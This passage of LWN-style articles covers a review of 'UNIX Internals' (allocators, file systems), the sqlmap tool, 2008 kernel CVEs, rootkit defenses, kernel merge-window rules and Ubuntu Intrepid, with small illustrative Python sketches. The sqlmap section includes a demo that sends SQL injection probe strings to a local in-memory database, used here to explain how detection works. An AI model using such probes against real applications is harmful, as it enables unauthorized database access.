Each following KMA is discussed in terms of the problems it solves
from previous allocators, along with the problems it introduces.  The
resource map's sorted list of base/size pairs is followed by
power-of-two free lists with a one-word in-buffer header (better
performance, low external fragmentation, but high internal
fragmentation, especially for exact power-of-two allocations), the
McKusick-Karels allocator (power-of-two free lists optimized for
power-of-two allocation; extremely fast, but prone to external
fragmentation), the buddy allocator (buffer splitting on power-of-two
boundaries plus coalescing of adjacent free buffers; poor performance
due to unnecessary splitting and coalescing), and the lazy buddy
allocator (buddy plus delayed buffer coalescing; good steady-state
performance but unpredictable under changing workloads).  The
accompanying diagrams of the data structures and buffers used to
implement each allocator are particularly helpful in understanding the
structure of the allocators.
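
Two of the points above come down to simple arithmetic, sketched here under
stated assumptions: a 4-byte header and a 32-byte minimum buffer size (both
chosen for illustration only), and buddy buffers addressed by their offset
from the start of the managed region.

```python
HEADER = 4  # assumed size of the one-word in-buffer header, in bytes


def pow2_bucket(request, header=HEADER, min_size=32):
    """Buffer size a power-of-two free-list allocator would hand out."""
    size = min_size
    while size < request + header:
        size *= 2
    return size


def buddy_of(offset, size):
    """Offset of the buddy of a power-of-two buffer at `offset`."""
    # Buffers are aligned to their own size, so the buddy differs
    # from the buffer only in the bit equal to `size`.
    return offset ^ size
```

With these assumptions, a request for exactly 512 bytes no longer fits in a
512-byte buffer once the header is added and is served from the 1024-byte
list, wasting nearly half the buffer. The buddy computation shows why
coalescing is cheap to test for: the neighbour to merge with is found with
a single XOR.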


After covering the simpler KMAs, we get into more interesting
territory: the zone allocator from Mach, the hierarchical allocator
from Dynix, and the SLAB allocator, originally implemented on Solaris
and later adopted by several UNIXes, including Linux and the BSDs.
Mach's zone allocator is the only fully garbage-collected KMA studied,
with the concomitant unpredictable system-wide performance slowdowns
during garbage collection, which would strike it from most developers'
lists of useful KMAs.  But as with the resource map allocator, we
still have lessons to learn from the zone allocator.  Many of the
features of the zone allocator also appear in the SLAB allocator,
commonly considered the current best-of-breed KMA.


The zone allocator creates a "zone" of memory reserved for each class
of object allocated (e.g., inodes), similar to kmem caches in the
later SLAB allocator.  Pages are allocated to a zone as needed, up to
a limit set at zone allocation time.  Objects are packed tightly
within each zone, even across pages, for very low internal
fragmentation.  Anonymous power-of-two zones are also available.  Each
zone has its own free list and once a zone is set up, allocation and
freeing simply add and remove items from the per-zone free list (free
list structures are also allocated from a zone).  Memory is reclaimed
on a per-page basis by the garbage collector, which runs as part of
the swapper task.  It uses a two-pass algorithm: the first pass counts
up the number of free objects in each page, and the second pass frees
empty pages.  Overall, the zone allocator was a major improvement on
previous KMAs: fast, space efficient, and easy to use, marred only by
the inefficient and unpredictable garbage collection algorithm.
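
The two-pass reclamation can be sketched as follows. This is a simplified
model rather than Mach's code: it assumes a 4096-byte page, takes the free
list as a collection of object offsets within the zone, and counts free
bytes per page (instead of free objects) so that objects straddling a page
boundary are handled.

```python
PAGE_SIZE = 4096  # assumed page size


def reclaimable_pages(free_offsets, obj_size, zone_pages, page_size=PAGE_SIZE):
    """Return the indexes of zone pages that contain only free objects."""
    free_bytes = [0] * zone_pages

    # Pass 1: walk the free list, crediting each page with the free
    # bytes that fall inside it (an object may span two pages).
    for off in free_offsets:
        start, end = off, off + obj_size
        while start < end:
            page = start // page_size
            chunk_end = min(end, (page + 1) * page_size)
            free_bytes[page] += chunk_end - start
            start = chunk_end

    # Pass 2: a page whose every byte belongs to a free object is empty.
    return [p for p, n in enumerate(free_bytes) if n == page_size]
```

Both passes touch every free object in the zone, which hints at why the
cost of a collection is hard to bound.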


The next KMA on the list is the hierarchical memory allocator for
Dynix, which ran on the highly parallel Sequent S2000.  One of the
major designers and implementers is our own Paul McKenney, familiar to
many LWN readers as the progenitor of the read-copy-update (RCU)
system used in many places in the Linux kernel.  The goal of the Dynix allocator was
efficient parallel memory allocation, in particular avoiding lock
contention between processors.  The solution was to create several
layers in the memory allocation system, with per-cpu caches at the
bottom and collections of large free segments at the top.  As memory
is freed or allocated, regions move up and down one level of the
hierarchy in batches.  For example, each per-cpu cache has two free
lists, one in active use and the other in reserve.  When the active
list runs out of free buffers, the free buffers from the reserve list
are moved onto it, and the reserve list replenishes itself with
buffers from the global list.  All the work requiring synchronization
between multiple CPUs happens in one big transaction, rather than
incurring synchronization overhead on each buffer allocation.
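
A minimal sketch of the lowest two layers, assuming a batch size of four
buffers and hypothetical class names, shows how batching keeps the global
lock off the fast path. It counts lock acquisitions so the effect is
visible; the real allocator has more layers and is not written like this.

```python
import threading


class GlobalPool:
    """Shared pool of free buffers, protected by a single lock."""

    def __init__(self, buffers):
        self.lock = threading.Lock()
        self.buffers = list(buffers)
        self.lock_acquisitions = 0

    def get_batch(self, n):
        with self.lock:
            self.lock_acquisitions += 1
            batch, self.buffers = self.buffers[:n], self.buffers[n:]
            return batch

    def put_batch(self, batch):
        with self.lock:
            self.lock_acquisitions += 1
            self.buffers.extend(batch)


class PerCpuCache:
    """Per-CPU cache with an active and a reserve free list."""

    def __init__(self, pool, batch=4):
        self.pool = pool
        self.batch = batch
        self.active = pool.get_batch(batch)
        self.reserve = pool.get_batch(batch)

    def alloc(self):
        if not self.active:
            # Promote the reserve list and refill it in one transaction.
            self.active = self.reserve
            self.reserve = self.pool.get_batch(self.batch)
        return self.active.pop() if self.active else None

    def free(self, buf):
        if len(self.active) >= self.batch:
            # Active list is full: return the reserve list as a batch.
            if self.reserve:
                self.pool.put_batch(self.reserve)
            self.reserve, self.active = self.active, []
        self.active.append(buf)
```

In this model, eight allocations from a fresh cache take the global lock
three times (two to prime the lists, one to refill), rather than once per
buffer.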


The Dynix allocator was a major advance: 3 - 5 times faster than the
BSD allocator even on a single CPU.  Its memory reclamation system was
far more efficient than the zone allocator's, performed on an on-going
basis with bounded worst case performance on each operation.
Performance on SMP systems was unparalleled.


The final KMA in this chapter is the SLAB allocator, initially
implemented on Solaris and later re-implemented on Linux and BSD.  The
SLAB allocator refined some existing techniques (simple allocation/free
computations for small cache footprint, per-object caches) and
introduced several new ones (cache coloring, efficient object reuse).
The result is an allocator that was both the best performing and the
most efficient by a wide margin - only 14% fragmentation versus 27%
for the SunOS 4.1.3 sequential-fit allocator, 45% for the 4.4BSD
McKusick-Karels allocator, and 46% for the SunOS 5.x buddy allocator.


Like the zone allocator, SLAB allocates per-object caches (along with
anonymous caches in useful sizes) called kmem caches.  Each cache has
an associated optional constructor and destructor function run on the
objects in a newly allocated and newly freed page, respectively (though the
destructor has since been removed in the Linux allocator).
Each cache is a doubly-linked list of slabs - large contiguous chunks
of memory.  Each slab keeps its slab data structure at the end of the
slab, and divides the rest of the space into objects.  Any leftover
free space in the slab is divided between the beginning and end of the
objects in order to vary the offset of objects with respect to the CPU
cache, improving cache utilization (in other words, cache coloring).
Each object has an associated 4-byte free list pointer.
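
Cache coloring is easy to illustrate with made-up numbers. The sketch below
assumes 24 bytes of leftover space per slab and 8-byte object alignment;
the function name is hypothetical.

```python
def color_offsets(leftover, align, n_slabs):
    """Offset of the first object in each of n_slabs successive slabs."""
    # Each "color" shifts the objects by one alignment unit; the
    # leftover space bounds how many distinct colors are available.
    n_colors = leftover // align + 1
    return [(i % n_colors) * align for i in range(n_slabs)]
```

Under these assumptions, six slabs created one after another start their
objects at offsets 0, 8, 16, 24, 0, and 8, so the same field of objects in
different slabs does not always land on the same cache lines.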


The slabs within each kmem cache are in a doubly linked list, sorted
so that free slabs are located at one end, fully allocated slabs at
the other, and partially allocated slabs in the middle.  Allocations
always come from partially allocated slabs before touching free
slabs.  Freeing an object is simple: since slabs are always the same
size and alignment, the base address of the slab can be calculated
from the address of the object being freed.  This address is used to
find the slab on the doubly linked list.  Free counts are maintained
on an on-going basis.  When memory pressure occurs, the slab allocator
walks the kmem caches freeing the free slabs at the end of the cache's
slab list.  Slabs for larger objects are organized differently, with
the slab management structure allocated separately and additional
buffer management data included.
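
The address calculation used when freeing an object amounts to masking off
the low bits. A sketch, assuming 4096-byte slabs aligned to their own size
(the constant and function names are illustrative, not taken from any
kernel):

```python
SLAB_SIZE = 4096  # assumed slab size; must be a power of two


def slab_base(obj_addr, slab_size=SLAB_SIZE):
    """Base address of the slab containing the object at obj_addr."""
    return obj_addr & ~(slab_size - 1)


def object_index(obj_addr, obj_size, first_obj_offset=0, slab_size=SLAB_SIZE):
    """Position of the object within its slab, counting from zero."""
    offset = obj_addr - slab_base(obj_addr, slab_size) - first_obj_offset
    return offset // obj_size
```

No search is needed to get from an object to its slab, which is part of
what keeps the free path short.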


This section of UNIX Internals has aged particularly well, partly
because the SLAB allocator continues to work well on modern systems.
As Vahalia notes, the SLAB allocator initially lacked optimizations
for multi-processor systems, but these were added shortly afterward,
using many of the same techniques as the Dynix hierarchical allocator.
Since then, most production kernel memory allocators have been
SLAB-based.  Recently, Christoph Lameter rewrote SLAB
to get the SLUB allocator for Linux; both are available as kernel
configuration options. (The third option, the SLOB allocator, is not
related to SLAB - it is a simple allocator optimized for small
embedded systems.) When viewed in isolation, the SLAB allocator may
appear arbitrary or over-complex; when viewed in the context of
previous memory allocators and their problems, the motivation behind
each design decision is intuitive and clear.

File System Implementations

UNIX Internals includes four chapters on file systems, covering the
user and kernel file system interface (VFS/vnode), implementations of
on-disk and in-memory file systems, distributed/network file systems,
and "advanced" file system topics - journaling, log-structured file
systems, etc.  Despite the intervening years, these four chapters are
the most comprehensive and practical description of file systems
design and implementation I have yet seen.  I definitely recommend it
over
UNIX
File System Design and Implementation - a massive sprawling book
which lacks the focus and advanced implementation details of UNIX
Internals.


The chapter on file system implementations is too packed with useful
detail to review fully in this article, so I'll focus on the points
that are relevant to current hot file system design problems.  The
chapter describes the System V File System (s5fs) and Berkeley Fast
File System (FFS) implementations in great detail, followed by a
survey of useful in-memory file systems, including tmpfs, procfs
(a.k.a. /proc file system), an early variant of a device file
system called specfs, and a sysfs-style interface for managing
processors.  This chapter also covers the implementation of buffer
caches, inode caches, directory entry caches, etc.  One of the
features of this chapter (as elsewhere in the book) is the carefully
chosen bibliography.  Bibliographies in research papers serve a double
purpose as demonstrations of the authors' breadth of knowledge in the
area and tend to be cluttered with more marginal references; the
per-chapter bibliographies in UNIX Internals list only the most
relevant publications and make excellent supplementary reading guides.


The System V File System (s5fs) evolved from the first UNIX file system.  The
on-disk layout consists of a boot block followed by a superblock
followed by a single monolithic inode table.  The remainder of the
disk is used for data and indirect blocks.  File data blocks are
located via a standard single/double/triple indirect block scheme.
s5fs has no block or inode allocation bitmaps; instead it maintains
on-disk free lists.  The inode free list is partial; when no more free
inodes are on the list, it is replenished by scanning the inode table.
Free blocks are tracked in a singly linked list rooted in the
superblock - a truly terrifying design from the point of view of file
system repair, especially given the lack of backup superblocks.
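
The single/double/triple indirect scheme can be made concrete with a short
sketch. The parameters are assumptions for illustration: 10 direct block
pointers in the inode and 256 pointers per indirect block (for example,
1024-byte blocks with 4-byte pointers).

```python
def indirection_level(block_no, ndirect=10, ptrs_per_block=256):
    """How many indirect blocks must be read to find a logical file block.

    Returns 0 for direct blocks, 1 for single indirect, and so on.
    """
    if block_no < ndirect:
        return 0
    block_no -= ndirect
    for level in (1, 2, 3):
        span = ptrs_per_block ** level  # blocks reachable at this level
        if block_no < span:
            return level
        block_no -= span
    raise ValueError("block number beyond the triple indirect range")
```

With these numbers, logical blocks 0 through 9 are direct, 10 through 265
need one extra read, and everything past block 65801 needs three, each of
them a potential seek on a cold cache.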


In many respects, s5fs is simultaneously the simplest and the worst
UNIX file system possible: its throughput was commonly as little as 5%
of the raw disk bandwidth, it was easily corrupted, it had a 14
character limit on file names, and so on.  On the other hand, elements
of the s5fs design have come back into vogue, often without addressing
the inherent drawbacks, which remain unsolved decades later.


The most striking example of a new/old design principle illustrated by
s5fs is the placement of most of the metadata in one spot.  This
turned out to be a key performance problem for s5fs, as every uncached
file read virtually guaranteed a disk seek of non-trivial magnitude
between the location of the metadata at the beginning of the disk and
the file data, located anywhere except the beginning of the disk.  One
of the major advances of FFS was to distribute inodes and bitmaps
evenly across the disk and allocate associated file data and indirect
blocks nearby.  Recently, collecting metadata in one place has
returned as a way to optimize file system check and repair time as
well as other metadata-intensive operations.  It also appears in
designs that keep metadata on a separate high-performance device
(usually solid state storage).


The problems with these schemes are the same as the first time around.
For the fsck optimization case, most normal workloads will suffer from
the required seek for reads of file data from uncached inodes (in
particular, system boot time would suffer greatly).  In the separate
metadata device case, the problem of keeping a single,
easily-corrupted copy of important metadata returns.  Currently, most
solid-state storage is less reliable than disk, yet most proposals to
move file system metadata to solid state storage make no provision for
backup copies on disk.


Another cutting edge file system design issue first encountered in
s5fs is backup, restore, and general manipulation of sparse files.
System administrators quickly discovered that it was possible to
create a user-level backup that could not be restored because the
tools would attempt to actually write (and allocate) the zero-filled
unallocated portions of sparse files.  Even more intelligent tools
that do not explicitly write zero-filled portions of files still had
to pointlessly copy pages of zeroes out of the kernel when reading
sparse files.  In general, the file and socket I/O interface requires
a lot of ultimately unnecessary copying of file data into and out of
the kernel for common operations.  It has only been in the last few
years that more sophisticated file system interfaces have been
proposed and implemented, including SEEK_HOLE/SEEK_DATA
and splice() and friends.
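
To make the sparse-file point concrete, here is a minimal sketch of how a backup tool might find only the allocated regions of a file rather than reading pages of zeroes. It assumes a Linux system where Python exposes os.SEEK_DATA and os.SEEK_HOLE; the function names data_extents() and make_sparse_demo() are invented for this illustration and do not come from any existing tool.

```python
import errno
import os
import tempfile


def data_extents(path):
    """Return (offset, length) pairs for the regions of a file that hold data.

    Relies on lseek() with SEEK_DATA/SEEK_HOLE.  A file system without
    hole support simply reports the whole file as one data extent.
    """
    extents = []
    fd = os.open(path, os.O_RDONLY)
    try:
        size = os.fstat(fd).st_size
        offset = 0
        while offset < size:
            try:
                start = os.lseek(fd, offset, os.SEEK_DATA)
            except OSError as err:
                if err.errno == errno.ENXIO:
                    break  # nothing but a hole between offset and EOF
                raise
            # The end of the file always counts as a hole, so this succeeds.
            end = os.lseek(fd, start, os.SEEK_HOLE)
            extents.append((start, end - start))
            offset = end
    finally:
        os.close(fd)
    return extents


def make_sparse_demo():
    """Create a temporary file with data at both ends and a 1MB gap between."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as f:
        f.write(b"head")
        f.seek(1 << 20)  # skip ahead without writing anything
        f.write(b"tail")
    return path
```

A copy tool built on this would read and write only the listed extents and seek over the rest, so the restored file stays sparse. How many extents are reported, and how large they are, depends on the file system's block size.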


The chapters on file systems are definitely frustratingly out of date,
especially with regard to advances in on-disk file system design.
You'll find little or no discussion of copy-on-write file systems,
extents, btrees, or file system repair outside of the context of
non-journaled file systems.  Unfortunately, I can't offer much in the
way of a follow-up reading list; most of the papers in my
file systems reading list
are covered in this book (exceptions include the papers on soft
updates, WAFL, and XFS).  File systems developers seem to publish less
often than they used to; often the options for learning about the
cutting edge are reading the code, browsing the project wiki, and
attending presentations from the developers.  Your next opportunity
for the latter is the Linux
Plumbers Conference, which has a number of file system-related
talks.


Another major flaw in the book, and one of the few places where
Vahalia was charmed by an on-going OS design fad, is the near-complete
lack of coverage of TCP/IP and other networking topics (the index
entry for TCP/IP lists only two pages!).  Instead, we get an entire
chapter devoted to streams, at the time considered the obvious next
step in UNIX I/O.  If you want to learn more about UNIX networking
design and implementation, this is the wrong book; buy some of the
Stevens and Comer networking books instead.

Summary

UNIX Internals was the original inspiration for the Kernel Hacker's
Bookshelf series, simply because you could always find it on the
bookshelf of every serious kernel hacker I knew.  As the age of the
book is its most serious weakness, I originally intended to wait until
the planned second edition was released before reviewing it.  To my
intense regret, the planned release date came and went and the second
edition now appears to have been canceled.


UNIX Internals is not the right operating systems book for everyone;
in particular, it is not a good textbook for an introductory operating
systems course (although I don't think I suffered too much from the
experience).  However, UNIX Internals remains a valuable reference book
for the practicing kernel developer and a good starting point for
the aspiring kernel developer.


		Find SQL injection vulnerabilities with sqlmap


SQL injections are a particularly
nasty type of web application vulnerability that can lead to loss or
disclosure of the contents of a database.  Testing a web application to find SQL
injection holes can be a tedious process, which is where the sqlmap tool may come in handy.
sqlmap automates the process of testing a particular web page for various
kinds of SQL injection flaws.


Sqlmap is a command-line driven Python application that can help in both
finding and exploiting SQL injections.  By giving it a URL and parameter
names of interest (from HTML forms or GET parameters), it tries to
determine which of those parameters cause different output based on their
value, indicating that they control the dynamic behavior of the
application.  Those parameters are then tested by repeatedly making an HTTP 
request with slightly different values.  Each of the values passed
corresponds to a SQL injection technique, such as appending a
single-quote.  Based on whether the HTML response is different from the
original response, the
potential for a SQL injection can be inferred.
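
The response-comparison idea can be sketched in a few lines against a local, in-memory SQLite database. This is not sqlmap's code; it illustrates just one such technique, a pair of boolean probes, and every name in it (make_db(), vulnerable_page(), safe_page(), looks_injectable()) is made up for the example. The "pages" are plain functions standing in for HTTP requests.

```python
import sqlite3


def make_db():
    """Build a tiny in-memory database to test against."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?)",
                   [(1, "apple"), (2, "pear")])
    return db


def vulnerable_page(db, name):
    """Hypothetical handler that pastes its parameter into the SQL text."""
    query = "SELECT id FROM items WHERE name = '%s'" % name
    try:
        rows = db.execute(query).fetchall()
    except sqlite3.Error:
        return "error"
    return ",".join(str(item_id) for (item_id,) in rows)


def safe_page(db, name):
    """The same lookup using a bound parameter instead of string pasting."""
    rows = db.execute("SELECT id FROM items WHERE name = ?",
                      (name,)).fetchall()
    return ",".join(str(item_id) for (item_id,) in rows)


def looks_injectable(page, db, value):
    """Compare the original response with an always-true and an
    always-false variant of the parameter.

    If the true variant matches the original and the false variant does
    not, the parameter is evidently being interpreted as SQL.
    """
    baseline = page(db, value)
    true_resp = page(db, value + "' AND '1'='1")
    false_resp = page(db, value + "' AND '1'='2")
    return true_resp == baseline and false_resp != baseline
```

Here looks_injectable(vulnerable_page, db, "apple") reports a problem while the same probe against safe_page() does not, since the bound parameter is only ever treated as a value.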


The tool also tests an often overlooked input source: cookies.  The user
can specify a cookie value which the tool will then manipulate to attempt a
SQL injection via the cookie.  Since many applications store their session
information in a database using the cookie value as a key, this is a
relatively common route to SQL injection—one that penetration tests
sometimes miss.


While it does help remove some of the tedium involved in testing for SQL
injections, sqlmap is by no means an automated solution.  A fair amount of
work is required to find a vulnerable parameter. Once a
vulnerability has been found, though, a great deal of information,
including database contents, can be retrieved with a single command.


Like many security tools, sqlmap can be used by those of malicious intent
rather easily.  The automated retrieval of database passwords and contents
from a vulnerable application is particularly powerful, and thus
dangerous.  For some database installations, there is even a mode that will
get a shell prompt on the server as the user that runs the database
application.


Because it is free software, sqlmap is very useful for understanding SQL
injections and, perhaps more importantly, what kinds of things an attacker
can do by abusing a vulnerable application.  There is excellent documentation,
both for developers and users.

The sqlmap project recently released version 0.6, which is
certainly worth a look for anyone interested in testing a web application
or curious about SQL injection in general.


		Kernel security, year to date


Earlier this year, your editor asked a high-profile kernel developer, in a
public discussion at a conference, about the seemingly large number of
kernel-related security bugs.  Was the number of these vulnerabilities of
concern, and what was being done about it?  The answer that came back was
that security issues aren't a huge concern, that most of the reported
issues were obscure local exploits requiring the presence of specific
hardware.  Serious issues, like the vmsplice()
vulnerability, are rare.  

More recently, as part of the panic associated with getting a talk together
for the Linux Plumbers
Conference, your editor decided to take a closer look at kernel
vulnerabilities.  It turns out that there are, in fact, quite a few of
them.  The vulnerabilities which have been given CVE numbers in 2008 (so
far) are: 


That is 41 CVE numbers (so far) for 2008 - not a small number.  Fully 1/3
of these vulnerabilities were in the networking subsystem, which is scary:
this is the most likely place to find remotely-exploitable problems in the
kernel.  It is true that sites not running SCTP or DCCP can forget about
many of those, and IPv6 is responsible for a few of the rest, so most of
those vulnerabilities were not a concern for most sites. 


Many of the
remaining vulnerabilities were in the core kernel or in
architecture-specific code.
The number of vulnerabilities found in drivers - the part of the kernel
which has long been sneered at as containing the worst code - is actually
quite small.  On the other hand, four of the CVE-listed vulnerabilities
(the Xen, AppArmor, and utrace problems) 
were caused by out-of-tree code added by distributors.  There is no way to
know how many vulnerabilities were fixed without obtaining a CVE number - or
without even realizing that a vulnerability existed in the first place.

When a single program is responsible for this many vulnerabilities, it
makes sense to ask why.  The kernel, of course, is a very large program;
more code means more bugs, some of which will have security implications.
Beyond that, though, the kernel runs in a special, privileged environment.
Flaws which would simply be fixed as just-another-crash in a normal
application are denial-of-service vulnerabilities in the kernel - or
worse.  So a larger number of vulnerabilities in the kernel does not, by
itself, imply that the kernel's code is worse than that of other programs;
it only reflects the fact that the consequences of kernel bugs tend to be
more severe.


The discovery (and repair) of vulnerabilities does not necessarily imply
that our current process is creating a lot of vulnerabilities; it could be
that we are mostly fixing older problems.  If the developers are 
fixing vulnerabilities more quickly than they are adding more, life should
be good in the long run.  The vulnerabilities in the list above vary from
those which are very old (affecting 2.4 kernels too) to some which are very
new (the UVC driver was added in 2.6.26).  Some of them are in code which,
while being intended for the mainline, has not yet been merged.  It is
probably impossible to say whether security problems are being fixed more
quickly than they are being created, but one thing is clear: all of that
code flowing into the mainline is bringing a certain number of security
problems with it.

For that reason, it is a little discouraging that there is little work
being done in the kernel community with the explicit goal of improving the
security of the kernel. Few patches are reviewed with security issues in
mind; the vmsplice() vulnerability, as one example, was a clear
failure of the review process.  There are undoubtedly many people who are
doing fuzz testing and such - some of them are even the good guys - but
much of the formal testing going on seems aimed more at API conformance
than at security verification.  There must be more work going on behind the
scenes, but it is still hard to avoid a sense of a certain amount of
complacency with regard to security issues.


As a community, we take pride in the security of our system.  But one
vulnerability per week is not the most inspiring security record.  It would
be good to find a way to do better than that.  Better tools must be a part
of the solution, but more thorough code review is also needed.  There still
is no substitute for a pair of eyeballs looking for ways in which new code
might be subverted.  Asking for more security-oriented review seems
ambitious when code review is already one of the biggest bottlenecks in the
development process.  But the alternative would appear to be to continue to
add to our collection of CVE numbers.

		System calls and rootkits


A patch to add some security checks before making system calls would seem
like a reasonable addition to the kernel, but because it is, at best, a
half-measure, it received a less than enthusiastic response.  
Preventing rootkits—malware that alters the kernel to hide its
presence and function—from altering the system call table was the
rationale 
behind the patch, but it would only work for the current crop of
rootkits.  Once that change was made, rootkit authors would just change their
modus 
operandi in response.


There are many possible
ways that a root user—or malware running as root—can modify a
Linux system to run rootkit code. Some currently "popular" rootkits modify
the system call table, though it is ostensibly read-only.  Some commercial malware
scanners that run on Linux have also been known to use this technique.  In
both cases, certain system 
calls are re-routed from the standard kernel code to code that lives
elsewhere.  That code, running in kernel mode, can then do just about
anything it wants with the system.


Arjan van de Ven proposed a patch that hooked into the
system call entry code to check the
address of the call to ensure that it was within the addresses
occupied by kernel code.  He describes the change and its impact this way:

The patch below, while obviously not perfect protection against malware,
adds some cheap sanity checks to the syscall path to verify the
system call is actually still in the kernel code region and not some
external-to-this region such as a rootkit.

The overhead is very minimal; measured at 2 cycles or less.
(this is because the branches get predicted right and the rest of the
code is almost perfectly parallelizable... and an indirect function call
is a branch issue anyway)
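
The check being described is, at its core, a range comparison. The sketch below models it in user space with made-up addresses; it is not the patch itself, and find_hooked_entries() and its parameters are hypothetical names chosen for the illustration.

```python
def find_hooked_entries(table, text_start, text_end):
    """Return the indices of system call table entries whose target
    address lies outside the kernel text region [text_start, text_end)."""
    return [index for index, addr in enumerate(table)
            if not (text_start <= addr < text_end)]


# Made-up numbers: kernel text at 0x1000-0x2000, third entry redirected.
SAMPLE_TABLE = [0x1000, 0x1800, 0x9000]
SUSPECT = find_hooked_entries(SAMPLE_TABLE, 0x1000, 0x2000)
```

With these sample values, only the third entry falls outside the text region and would be flagged.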


Various kernel hackers pointed out the flaws inherent in that scheme.  As Andi
Kleen succinctly puts it:

This just means that the root kits will switch to patch
the first instruction of the entry points instead.
[...]
So the protection will be zero to minimal, but the overhead will
be there forever.


One of the more interesting ideas to come out of the discussion was Alan
Cox's suggestion of using a
hypervisor to enforce protections:

The only place you can expect to make a difference here is in virtualised
environments by teaching KVM how to provide 'irrevocably read only' pages
to guests where the guest OS isn't permitted to change the rights back or
the virtual mapping of that page.


Ingo Molnar described a rather complicated
scheme that might increase the likelihood of a rootkit being detected, but
with a fairly high cost—in build complexity as well as the ability
to debug the resulting kernel.  The compiler would be changed to insert
calls to rootkit checks randomly throughout the kernel binary in ways that
would be 
difficult or impossible for a rootkit to detect and evade.  In the end,
though, a rootkit could simply install a new kernel that does exactly what
it wants, then cause, or wait for, a reboot.


Without some kind of hardware enforcement (e.g. Trusted
Platform Module) or locked-down virtualization, Linux is defenseless
against attacks that run as 
root.  The kernel could change to thwart a particular kind of attack, as
van de Ven's patch does, but other kinds of attacks will still succeed.  It
is clearly a situation where "the only way to win is not to play this
game", as Pavel Machek—amongst others—noted in the thread.


In the end, van de Ven wrote off the patch as an exercise in measuring the
cost of this kind of runtime checking.  It was a fairly low-cost solution,
but without any major upside.  The real upside was getting kernel hackers
thinking about the problem, which could lead to some better solutions
down the road.


		Tightening the merge window rules


The 2005 kernel summit
included a discussion on a recurring topic: how can the community produce
kernels with fewer bugs?  One of the problems which was identified in that
session was that significant changes were often being merged late in the
development cycle with the result that there was not enough time for
testing and bug fixing.  In response, the summit attendees proposed the
concept of the "merge window," a two-week period in which all major changes
for a given development cycle would be merged into the mainline.  Once the
merge window closed, only fixes would be welcome.

Three years later, the merge window is a well established mechanism.  Over
that time, the discipline associated with the merge window has gotten
stronger; it is now quite rare that significant changes go into the
mainline outside of the merge window.  The one notable exception is that
new drivers can be accepted later in the cycle, based on the reasoning that
a driver, being completely new and self-contained functionality, cannot
cause regressions.  Even then, there are hazards: the UVC webcam driver,
merged quite late in the 2.6.26 cycle (in 2.6.26-rc9), brought a security
hole with it.

The merge window rule is often expressed as "only fixes can go in after the
-rc1 release."  Recent discussions have made it clear, though, that Linus
is starting to develop a rather more restrictive view of how development
should go outside of the merge window.  The imminent 2008 kernel summit may
well find itself taking on this topic and making some changes to the rules.

In short, Linus has concluded that "fixes only" is not disciplined enough;
a lot of work characterized as a "fix" can, itself, be a source of new regressions.
So here's how Linus would like developers to
operate now:


Here's a simple rule of thumb:

    if it's not on the regression list
    if it's not a reported security hole
    if it's not on the reported oopses list

then why are people sending it to me?


There can be no doubt that the tighter rules have come as a surprise to a
number of developers - if nothing else, the frequency with which Linus has
found himself getting grumpy with patch submitters makes that clear.

And, the truth of the matter is that Linus has not enforced anything like
the above rule in the past.  Beyond new drivers, post-merge-window changes
have typically included things like coding style and white space fixups,
minor feature enhancements, defconfig updates, documentation updates,
annotations for the sparse 
tool, and so on.  Relatively few of these changes come equipped with an
entry on the regression list.

To look at this another way, here's a table which appeared in the 2.6.26 development
statistics article, updated with 2.6.27 (to date) information:


* (Through September 9).


2.6.27 appears to be following the trend set by previous kernels: on the
order of 25% of the total changesets will be merged outside of the nominal
merge window.  The most recent 2.6.27 regression summary shows
a total of 150 regressions during this development cycle, of which 33 were
unresolved.  That suggests that at least 2300 patches merged since 2.6.27-rc1
were not fixes for listed regressions.

So the "regression fixes only" policy is truly new - and not really
effective yet.  Should this policy hold, it could have a number of
interesting implications including, perhaps, an increase in the number of
non-regression fixes shipped in distributor kernels.  It might make
developers become more diligent about reporting regressions so that the
associated fix can be merged.  With fewer changes going in later in the
cycle, development cycles might just get a little shorter, perhaps even to
the eight weeks that was, once, the nominal target.  And, of course, we
might just get kernel releases with fewer bugs, which would be a hard thing
to complain about.  In the short term, though, expect more grumpy emails to
developers who are still trying to work by the older rules.

		What's up with the Intrepid Ibex


Ubuntu's current development release is called the Intrepid Ibex, which is soon to
become v8.10.  The Alpha5 release was announced
this week, which is pretty close to on schedule.  One
more alpha release is planned, followed by a single beta, and the final
release should be available by October 30, 2008.

Looking at the blueprints for
Intrepid we see a number of high priority items such as 3G
networking, which will be integrated into NetworkManager.
Another high priority item is an improved
Flash experience, which
aims to improve the plugin finder wizard, interact better with
sites that use the Flash detection kit, and offer a better user experience
when selecting available alternatives. Internally there are the Package
Status Pages, which are meant to provide a web page for each of the top
20-30 
packages in Ubuntu showing bug counts and other vital signs and
statistics.

What else is new in Intrepid?  GNOME 2.23.91, X.Org server
7.4, Linux kernel 2.6.27, and NetworkManager 0.7 are all being included.
An encrypted private
directory will also be added to each home directory.  In addition, there's a
Guest session available from the User Switcher panel applet to give
temporary access with restricted privileges.
  

Dynamic Kernel Module Support (DKMS) is also available in Intrepid.  It
allows kernel drivers to be automatically 
rebuilt when new kernels are released. This makes it possible for kernel
package updates to be made available immediately without waiting for
rebuilds of driver packages, and without third-party driver packages
becoming out of date.  Finally, the
"Last successful boot" recovery entry retains a copy of your running kernel
and makes it available from the boot loader.  This makes it possible for
old kernel packages to be safely auto-removed by the package manager,
instead of being kept indefinitely.

Kubuntu will be using KDE4, with no plans to support KDE3.  The Kubuntu wiki for
Intrepid says, "KDE 3 is obsolete and largely unmaintained. Keeping
with KDE 3 would offer no advantage over giving users Hardy."

Bug squashing has been ongoing, with a number of focused Hug Days.  The latest of
these will be held September 11 to focus on bugs
that don't have a package assigned to them.

There are still a few known
issues in the Alpha5 release, but overall the development is
progressing nicely.  Of course, if wild mountain goats are not
your thing (however intrepid they might be), you can always wait for the
more mythological Jaunty Jackalope, which
will be in the planning stages at an Ubuntu Developer Summit (UDS) in
Mountain View, 
California next December.

		Waiting for Rockbox 3.0 - again


Rockbox is a GPL-licensed replacement
firmware for a number of digital audio players.  LWN published an article on the imminent
Rockbox 3.0 release in May, 2006.  Well over two years later, it is
clear that some projects use a larger value of "imminent" than others.  In
this case, the Rockbox developers concluded that certain problems simply
were not going to be resolved in any reasonable 3.0 time frame; rather than
make a major release with known problems, they simply gave up on 3.0 at
that time.  As a result, the current stable Rockbox release is Rockbox 2.5,
from September, 2005.

It is probably safe to bet that few Rockbox users are running 2.5, which
only had support for a handful of Archos players.  Grabbing a daily build
is a fact of life in the Rockbox community.  Meanwhile, Rockbox has
